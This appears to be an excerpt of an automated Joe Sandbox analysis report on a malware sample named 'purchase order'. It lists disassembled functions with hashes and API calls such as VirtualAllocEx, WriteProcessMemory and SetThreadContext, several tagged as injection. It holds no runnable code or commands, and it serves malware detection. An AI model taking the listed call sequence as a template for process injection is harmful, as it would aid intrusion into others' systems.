                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: b4939ec658bb42c0bb7f141409a3a01a6cf4a6168f402f339a6f16f14279ec23
                                                                                                              • Instruction ID: 8e0d310402be7a53fa74c96511ccbbead2d02df3af39bb56cb82f6b1c7433fc8
                                                                                                              • Opcode Fuzzy Hash: b4939ec658bb42c0bb7f141409a3a01a6cf4a6168f402f339a6f16f14279ec23
                                                                                                              • Instruction Fuzzy Hash: 6F41F3B0C00619CFDB24DFA9C984BDEBBB5BF49304F24806AD408AB255DB756949CF90
                                                                                                              Function 068E6B28 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068E6BB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 8fb64a85de7568a4e70a98d19942520169b8056b4b9b75ae4cabc96bba84ac04
                                                                                                              • Instruction ID: d6335b58d813a9f49bd347b60c2fb2eeeceb28d3fe2c7766d9f759013b81cd70
                                                                                                              • Opcode Fuzzy Hash: 8fb64a85de7568a4e70a98d19942520169b8056b4b9b75ae4cabc96bba84ac04
                                                                                                              • Instruction Fuzzy Hash: 8E318B72D002098FDB10CFA9C840AEEFBF5FF88320F10842AE559A7250D738A555DFA0
                                                                                                              Function 068E6A38 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068E6AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: d32e2fe9624fe2e7d9bd05ab1abd9c59ad427247504bae12bc578eecb9acb6e1
                                                                                                              • Instruction ID: d64047b054b4151dea59e62cd3bfec9c4fcd36827d7bef8e265318e308a7b675
                                                                                                              • Opcode Fuzzy Hash: d32e2fe9624fe2e7d9bd05ab1abd9c59ad427247504bae12bc578eecb9acb6e1
                                                                                                              • Instruction Fuzzy Hash: 542148B1D002598FDB10DFA9C8807DEFBF1FF48314F108829E559A7250D7789954CBA4
                                                                                                              Function 068E6A40 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 068E6AD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 647ccc9b6ad7710a094fb4c124437032873dc06265b9872feaa3ac0a9fa6eed9
                                                                                                              • Instruction ID: e8370a39c6e084480a1cbb3838fb33769b50b787e6af8953bf4629353cf25683
                                                                                                              • Opcode Fuzzy Hash: 647ccc9b6ad7710a094fb4c124437032873dc06265b9872feaa3ac0a9fa6eed9
                                                                                                              • Instruction Fuzzy Hash: B42125B1D003599FCB10CFA9C885BDEBBF5FF48314F10842AE958A7250D778A994CBA4
                                                                                                              Function 068E8FAA Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 8f5d9719642e917257da34f8102b629ca69f22cffaeee4bbee614fca066c3512
                                                                                                              • Instruction ID: 2effc414fa805387c36d18e4f28a29f561d7a0aaefd385f10c98372d472ace3e
                                                                                                              • Opcode Fuzzy Hash: 8f5d9719642e917257da34f8102b629ca69f22cffaeee4bbee614fca066c3512
                                                                                                              • Instruction Fuzzy Hash: F521FFB1E042188FEF10CF99D4047DEBBF1AF46314F048069D501B7250C7BAA944CBA0
                                                                                                              Function 0235B0B4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: c0d94b2431e3b071a50d9808bbfc818e26a38cef931f0d5886dbd243a7ccce5d
                                                                                                              • Instruction ID: 6d335a3adbf50e1b4c86be3d1ebed887958cf1dadbeaa9f70a418daa6e64b1f1
                                                                                                              • Opcode Fuzzy Hash: c0d94b2431e3b071a50d9808bbfc818e26a38cef931f0d5886dbd243a7ccce5d
                                                                                                              • Instruction Fuzzy Hash: A221E4B590025CEFDB10CFAAD584ADEBBF8EB48324F14801AE958B7310D375A950CFA5
                                                                                                              Function 068E68A1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E6926
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 917ad4ed2487d9bae729656f52ef15a47fd05008f38457df1261493d8e59c21e
                                                                                                              • Instruction ID: 306146f0aec196ece194341a5683608717f8ac2676d8eecaac5b6160467433bd
                                                                                                              • Opcode Fuzzy Hash: 917ad4ed2487d9bae729656f52ef15a47fd05008f38457df1261493d8e59c21e
                                                                                                              • Instruction Fuzzy Hash: A92168B1D002098FDB10DFAAC4847EEBBF4EF59324F108429D559A7241DB789984CFA0
                                                                                                              Function 068E6B30 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 068E6BB0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 04f68373cc68e3c98318efe6d28d513783377a79acc4140073e0c7c4a1292bb4
                                                                                                              • Instruction ID: f8ee4f5190ece899bc637f1dfe15b284b76ea11e82f73d9ab1bd34abf45258dc
                                                                                                              • Opcode Fuzzy Hash: 04f68373cc68e3c98318efe6d28d513783377a79acc4140073e0c7c4a1292bb4
                                                                                                              • Instruction Fuzzy Hash: 662128B1D002599FCB10DFAAC840AEEFBF5FF48310F108429E558A7250D7789554CBA5
                                                                                                              Function 068E68A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 068E6926
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 2c4eef658b118b51210a93b3d55f505aa3fe871689a177c5d291c06aa0177caf
                                                                                                              • Instruction ID: fc7c0d2b475d169179f13d1e09cf4bfef3a1a986099be85135a70b0ce082ec13
                                                                                                              • Opcode Fuzzy Hash: 2c4eef658b118b51210a93b3d55f505aa3fe871689a177c5d291c06aa0177caf
                                                                                                              • Instruction Fuzzy Hash: 602168B1D002098FCB10DFAAC4847EEBBF4EF49324F108429D558A7240DB789984CFA4
                                                                                                              Function 0235D6A1 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 94fb12281cf9d7c2db6595eefba77a2a303d7a79634695ed2030dd1f4dc839a7
                                                                                                              • Instruction ID: 79ae025581266a3b2cd1632106a6a909c61d7f46165ea17e7bd6a343d343d973
                                                                                                              • Opcode Fuzzy Hash: 94fb12281cf9d7c2db6595eefba77a2a303d7a79634695ed2030dd1f4dc839a7
                                                                                                              • Instruction Fuzzy Hash: 2721F3B5900218DFDB10CFA9D584ADEBBF4FB48314F14842AE958B7360D378A954CF65
                                                                                                              Function 068E6979 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E69EE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 362753bb89bebeff4797cbdc56d49d907564074f20664b7ac521dddf1da9a67c
                                                                                                              • Instruction ID: 6efb7db277129e407920d7703eec99d9f3fd55022055f1ace996c0abb472a3b2
                                                                                                              • Opcode Fuzzy Hash: 362753bb89bebeff4797cbdc56d49d907564074f20664b7ac521dddf1da9a67c
                                                                                                              • Instruction Fuzzy Hash: 371189729002499FDB10DFAAC844ADEBBF5FF48324F108429E519A7250C775A554CFA0
                                                                                                              Function 068E67F1 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(00000004), ref: 068E685A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 58be0f4a98c6a1b80596d1febdc07a28e715196588acc8bbaba6ba1f74ceb786
                                                                                                              • Instruction ID: b54c30377f29f1e87f21817e99114f507cb660474d5b23cd221dae92404c66b3
                                                                                                              • Opcode Fuzzy Hash: 58be0f4a98c6a1b80596d1febdc07a28e715196588acc8bbaba6ba1f74ceb786
                                                                                                              • Instruction Fuzzy Hash: DE1158B1D002598FDB10DFAAC4447DEFBF4AB89324F20842DD519A7250CB75A584CF94
                                                                                                              Function 068E6980 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068E69EE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 6fd14dcea0d078c7f037b0c52d33c7e62eb29dd13c78f3f185bc19f6627bb26e
                                                                                                              • Instruction ID: 856685f558886e95c86623c1633a9a8e524ef089324d43e8981fb3854af25255
                                                                                                              • Opcode Fuzzy Hash: 6fd14dcea0d078c7f037b0c52d33c7e62eb29dd13c78f3f185bc19f6627bb26e
                                                                                                              • Instruction Fuzzy Hash: 5A1167729002488FCB10DFAAC844BDEBFF5EF88324F108419E559A7260C775A994CFA0
                                                                                                              Function 068E67F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(00000004), ref: 068E685A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 0685d93db16ae7eafda7944276e9d39637df2c38c5d8d6312629574c0a05ee9e
                                                                                                              • Instruction ID: bc894fb269c2f6ecefbec5683e5e3d97db8b22b768e09a5bb0330fdc92343d85
                                                                                                              • Opcode Fuzzy Hash: 0685d93db16ae7eafda7944276e9d39637df2c38c5d8d6312629574c0a05ee9e
                                                                                                              • Instruction Fuzzy Hash: 8F1136B1D002588FCB20DFAAC4457DEFBF4EF89324F208429D559A7250CB79A984CFA5
                                                                                                              Function 0235B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0235B41E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: b63282ce05b2de393861cd8cbad865048254a929a749ae14206a0f0fa6747b63
                                                                                                              • Instruction ID: a2e5454bb9f784a127aa47117411bb9363a11478102513d95cd168cc570005db
                                                                                                              • Opcode Fuzzy Hash: b63282ce05b2de393861cd8cbad865048254a929a749ae14206a0f0fa6747b63
                                                                                                              • Instruction Fuzzy Hash: 681113B5D002598FCB20CF9AC444ADEFBF5AF48318F10841AD869A7214C375A545CFA1
                                                                                                              Function 068E3490 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 1357161b1e20b4bef97dc19d055a217382672cc753de4b5931bd85a51a56aedc
                                                                                                              • Instruction ID: f88e3f4f3fed03c584b33db1fb89d600d755ca7c5a9ac07afa9c46d28cf14c34
                                                                                                              • Opcode Fuzzy Hash: 1357161b1e20b4bef97dc19d055a217382672cc753de4b5931bd85a51a56aedc
                                                                                                              • Instruction Fuzzy Hash: F41103B5800348DFDB10DF9AC849BDEBBF8EB49324F108459E958B7210C3B9A954CFA1
                                                                                                              Function 068E8F16 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 068E8F75
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: b2ee9ec9d7bedb91c9e84017ffede195a614e7590570263127d714c74c6fad93
                                                                                                              • Instruction ID: e0ff4251a010edb04aba3394565952b40b86dc932eaa2a43311ecc40a09d9580
                                                                                                              • Opcode Fuzzy Hash: b2ee9ec9d7bedb91c9e84017ffede195a614e7590570263127d714c74c6fad93
                                                                                                              • Instruction Fuzzy Hash: E411E5B5800349DFDB10DF9AC885BDEFBF8EB49324F108419E558A7210C379A554CFA5
                                                                                                              Function 04AFBA5C Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (bq
                                                                                                              • API String ID: 0-149360118
                                                                                                              • Opcode ID: 0d2b3ef9f9a7bdbdfc6d1f3add6d7f584c6bf484833781dc7df0efe5e749fddd
                                                                                                              • Instruction ID: 27c86d1099c2894641e0d11c35fdff56dbadd9fb78547b986c95a8fbac074500
                                                                                                              • Opcode Fuzzy Hash: 0d2b3ef9f9a7bdbdfc6d1f3add6d7f584c6bf484833781dc7df0efe5e749fddd
                                                                                                              • Instruction Fuzzy Hash: 0391E171A01208DFDB15EFA9D8446AEBFF2FF89300F10C46AE556A7651DB34A806CB91
                                                                                                              Function 04AF4200 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o^q
                                                                                                              • API String ID: 0-74704288
                                                                                                              • Opcode ID: 50a07d5df0b8ead0ce4b985fb989685469b84595db4498b51d91940a17b24035
                                                                                                              • Instruction ID: 16a573225746eae3893c1ec652c042d395468208d9bdc32cf1e6be472debc221
                                                                                                              • Opcode Fuzzy Hash: 50a07d5df0b8ead0ce4b985fb989685469b84595db4498b51d91940a17b24035
                                                                                                              • Instruction Fuzzy Hash: EB51AB75A002068FCB14DFE9C8846AFBBB2AFD8310F058A29F615DB355EB30F8418791
                                                                                                              Function 04AF3DD8 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d8cq
                                                                                                              • API String ID: 0-3601494702
                                                                                                              • Opcode ID: 4be4daa67adc948b023515eb07ec2fbc88053d49da01b23fa26bd5d441d0e795
                                                                                                              • Instruction ID: de644f2766e95c8701128ee69877115c941ea07ef14d03051c0a618536f6c50d
                                                                                                              • Opcode Fuzzy Hash: 4be4daa67adc948b023515eb07ec2fbc88053d49da01b23fa26bd5d441d0e795
                                                                                                              • Instruction Fuzzy Hash: 20614F35B001199FCF149FA8D954AAEBBF6EF88711F154065FA02AB390DB31ED41CB94
                                                                                                              Function 04AF1858 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q
                                                                                                              • API String ID: 0-671973202
                                                                                                              • Opcode ID: fbbb6e7887f1c57df1f582e3074e69904c4fbf7d14750f408f0f599d0bf3b7b9
                                                                                                              • Instruction ID: d690ccfbef1a49a8769d99b7f71c6ea1c512072eeeb0adef69f2614b0b1c4629
                                                                                                              • Opcode Fuzzy Hash: fbbb6e7887f1c57df1f582e3074e69904c4fbf7d14750f408f0f599d0bf3b7b9
                                                                                                              • Instruction Fuzzy Hash: D3419031B002158FCB15EFB9D8988AEBBF7EFC4310B148569E569DB351EB349D068790
                                                                                                              Function 04AFC050 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hbq
                                                                                                              • API String ID: 0-1245868
                                                                                                              • Opcode ID: 23fc1b345e5dcd80868abe3d535a5b22d9ece1bbafc5fc588b79642ea4950fa3
                                                                                                              • Instruction ID: 3e964f786d35e84ae44de02d3381ef0f6b3e6a3a93414085ed9c244b8785052b
                                                                                                              • Opcode Fuzzy Hash: 23fc1b345e5dcd80868abe3d535a5b22d9ece1bbafc5fc588b79642ea4950fa3
                                                                                                              • Instruction Fuzzy Hash: 6431E534A00209DFDB08AFA4D85899EBBB7FF89314F104569E502AB3E1DF34A845CB81
                                                                                                              Function 04AFFD80 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: bb16e9c5069610e18a8f4ff9ff4bad2f9b9b2c1a624dfc5388ecdcc0be8e3611
                                                                                                              • Instruction ID: 0519bac72d6836a5ca00cda2dea6f3f56c4a364522e991b98850399c086fce68
                                                                                                              • Opcode Fuzzy Hash: bb16e9c5069610e18a8f4ff9ff4bad2f9b9b2c1a624dfc5388ecdcc0be8e3611
                                                                                                              • Instruction Fuzzy Hash: 8621D771B002118FDF15BBB8D94057E7BB2AF89218B1440BBF609DB391DA35ED42C7A1
                                                                                                              Function 04AFFD71 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @
                                                                                                              • API String ID: 0-2766056989
                                                                                                              • Opcode ID: 65096ce841159fe32a3231f65af792321c1e1ad12435a2e0341b9e9b8e0966fb
                                                                                                              • Instruction ID: b573063f20e8ab2f0592bdaced580a19c3bce16b10bb64cf63ec20108a1e18c7
                                                                                                              • Opcode Fuzzy Hash: 65096ce841159fe32a3231f65af792321c1e1ad12435a2e0341b9e9b8e0966fb
                                                                                                              • Instruction Fuzzy Hash: BD11E971B00205CFEF157BA8D9805BDBBB2EB84208F00417AFB08DB381DB35AD0587A5
                                                                                                              Function 04AF43F1 Relevance: .3, Instructions: 305COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29a1c1ee7abb1f298b03a935365ad8f99a2fadaea12a9074f998febfecd9847b
                                                                                                              • Instruction ID: 2b274b3e79972880058a00ccf29baa1bf85a8f4ab8b9d7357a33b58824e0590d
                                                                                                              • Opcode Fuzzy Hash: 29a1c1ee7abb1f298b03a935365ad8f99a2fadaea12a9074f998febfecd9847b
                                                                                                              • Instruction Fuzzy Hash: B6B19F706002199FCB05DFA8D854AAF7BB6FF98340F148429F9169B394DB34ED56CB90
                                                                                                              Function 04AF2D18 Relevance: .3, Instructions: 256COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 552f231a74c662349d8dfe6cff32f5e7f4a4426dcdceeaf469334c71745de5c9
                                                                                                              • Instruction ID: 9affa7fde7dc28e2c90cabb7baa3e0f6d9009637212a5757089b7c071a4248f3
                                                                                                              • Opcode Fuzzy Hash: 552f231a74c662349d8dfe6cff32f5e7f4a4426dcdceeaf469334c71745de5c9
                                                                                                              • Instruction Fuzzy Hash: 78C1C075E01228CFDB24CFA9C984BDDBBB2BF49300F1085A9E419A7251DB35AA85CF51
                                                                                                              Function 04AFB410 Relevance: .2, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8dd22365092fc0ba0a4bb577f49278afc912a545fe1a00b09e3b9a0ce651666b
                                                                                                              • Instruction ID: 9b0101e3924bb9966a0d7fe1a09abe90c993f549e569d4c578576d78739fee05
